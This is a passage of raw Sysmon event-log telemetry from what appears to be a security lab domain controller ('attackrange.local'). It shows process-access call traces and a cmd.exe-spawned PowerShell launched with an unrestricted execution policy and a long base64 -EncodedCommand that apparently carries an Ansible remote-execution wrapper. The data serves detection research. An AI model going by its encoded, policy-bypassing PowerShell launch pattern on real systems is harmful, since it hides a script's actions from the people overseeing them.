4e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.180{10ACEC4A-857E-5FCF-9E00-000000009101}49244920C:\Windows\system32\cmd.exe{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.186{10ACEC4A-857E-5FCF-9F00-000000009101}4900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-857E-5FCF-9E00-000000009101}4924C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHA